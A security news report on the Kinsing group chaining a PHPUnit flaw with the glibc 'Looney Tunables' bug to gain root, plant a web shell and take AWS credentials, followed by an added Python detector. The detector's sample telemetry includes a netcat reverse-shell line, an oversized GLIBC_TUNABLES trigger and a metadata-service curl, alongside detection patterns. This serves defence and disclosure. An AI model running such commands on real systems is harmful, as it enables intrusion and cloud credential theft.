Hackers exploit Looney Tunables Linux bug, steal cloud creds
The operators of the Kinsing malware are targeting cloud environments with systems vulnerable to "Looney Tunables," a Linux security issue identified as CVE-2023-4911 that allows a local attacker to gain root privileges on the system.
Looney Tunables is a buffer overflow in glibc's dynamic loader (ld.so) introduced in glibc 2.34 in April 2021 but disclosed in early October 2023. Days after the disclosure, proof-of-concept (PoC) exploits became publicly available.
In a report from cloud security company Aqua Nautilus, researchers describe a Kinsing malware attack where the threat actor exploited CVE-2023-4911 to elevate permissions on a compromised machine.
Kinsing is known for breaching cloud-based systems and applications on them (e.g. Kubernetes, Docker APIs, Redis, and Jenkins) to deploy cryptomining software. Recently, Microsoft observed them targeting Kubernetes clusters through misconfigured PostgreSQL containers.
Aqua Nautilus researchers say that the attack starts with exploiting a known vulnerability in the PHP testing framework 'PHPUnit' to gain a code execution foothold, followed by triggering the 'Looney Tunables' issue to escalate privileges.
"Utilizing a rudimentary yet typical PHPUnit vulnerability exploitation attack, a component of Kinsing's ongoing campaign, we have uncovered the threat actor's manual efforts to manipulate the Looney Tunables vulnerability," reads the Aqua Nautilus report.
In contrast to their normal operational standard, Kinsing tested the new attack manually, probably to ensure it works as anticipated before developing exploitation scripts to automate the task.
Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a reverse shell over port 1337 on the compromised system, which Kinsing operators leverage to run reconnaissance commands like 'uname -a' and 'passwd.'
Additionally, the attackers drop a script named 'gnu-acme.py' on the system, which leverages CVE-2023-4911 for privilege elevation.
The exploit for Looney Tunables is fetched directly from the repository of the researcher who released a PoC, likely to hide their tracks. BleepingComputer notified the researcher of the abuse, and he promised to disrupt the malicious operation by replacing the exploit link.
The attackers also download a PHP script, which deploys a JavaScript web shell backdoor ('wesobase.js') that supports the subsequent attack stages.
Specifically, the backdoor provides attackers the ability to execute commands, perform file management actions, collect information about the network and the server, and perform encryption/decryption functions.
Ultimately, Kinsing showed interest in cloud service provider (CSP) credentials, particularly for accessing AWS instance identity data, which AquaSec characterizes as a notable shift towards more sophisticated and damaging activities for the threat actor.
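As an added example (not code from the article or from Aqua Nautilus), the following Python detector walks constructed process-telemetry lines for the artefacts named above (the port-1337 reverse shell, 'gnu-acme.py', 'wesobase.js', AWS instance identity lookups) and flags glibc versions in the affected range. The GLIBC_TUNABLES length heuristic and the 169.254.169.254 endpoint are assumptions based on how CVE-2023-4911 is triggered and where AWS serves instance identity data, not on the article.

```python
import re

# Constructed sample telemetry, "<pid> <user> <command line>" (not real capture data).
SAMPLE_EVENTS = [
    "4101 www-data nc 198.51.100.7 1337 -e /bin/sh",
    "4115 www-data uname -a",
    "4133 www-data python3 /tmp/gnu-acme.py",
    "4140 www-data GLIBC_TUNABLES=glibc.malloc.mxfast=" + "A" * 300 + " /usr/bin/su",
    "4152 root curl -s http://169.254.169.254/latest/dynamic/instance-identity/document",
    "4160 www-data sh -c 'base64 -d /tmp/p.b64 > /var/www/html/wesobase.js'",
    "4170 alice ls -la /home/alice",
]

# Stage name -> pattern over the command line. The first, second and fourth patterns
# use artefacts the article names; the GLIBC_TUNABLES and IMDS patterns are assumptions:
# CVE-2023-4911 is triggered through an oversized GLIBC_TUNABLES value, and AWS serves
# instance identity data from the link-local metadata service.
STAGE_PATTERNS = {
    "reverse-shell-1337": re.compile(r"\b(nc|ncat)\b.*\b1337\b|/dev/tcp/[\d.]+/1337\b"),
    "looney-tunables-loader": re.compile(r"gnu-acme\.py"),
    "looney-tunables-env": re.compile(r"\bGLIBC_TUNABLES=\S{200,}"),
    "web-shell-drop": re.compile(r"wesobase\.js"),
    "imds-credential-access": re.compile(
        r"169\.254\.169\.254/latest/(dynamic/instance-identity|meta-data/iam)"),
}


def match_stages(command_line: str) -> list[str]:
    """Return the attack-chain stages whose pattern matches this command line."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(command_line)]


def scan_events(events) -> list[tuple[int, str, str]]:
    """Return (pid, user, stage) for every event that matches a stage."""
    hits = []
    for line in events:
        pid, user, cmd = line.split(" ", 2)
        for stage in match_stages(cmd):
            hits.append((int(pid), user, stage))
    return hits


def glibc_version_in_affected_range(version: str) -> bool:
    """True for glibc 2.34 up to but excluding 2.39 (bug introduced in 2.34, fixed
    upstream before 2.39). Distributions backport the fix, so True means 'verify
    the distro patch level', not 'exploitable'."""
    major, minor = (int(x) for x in version.split(".")[:2])
    return (2, 34) <= (major, minor) < (2, 39)


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("pid=%d user=%s stage=%s" % hit)
```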
The researchers believe that this campaign was an experiment, since the threat actor relied on different tactics and expanded the scope of the attack to collecting Cloud Service Provider credentials.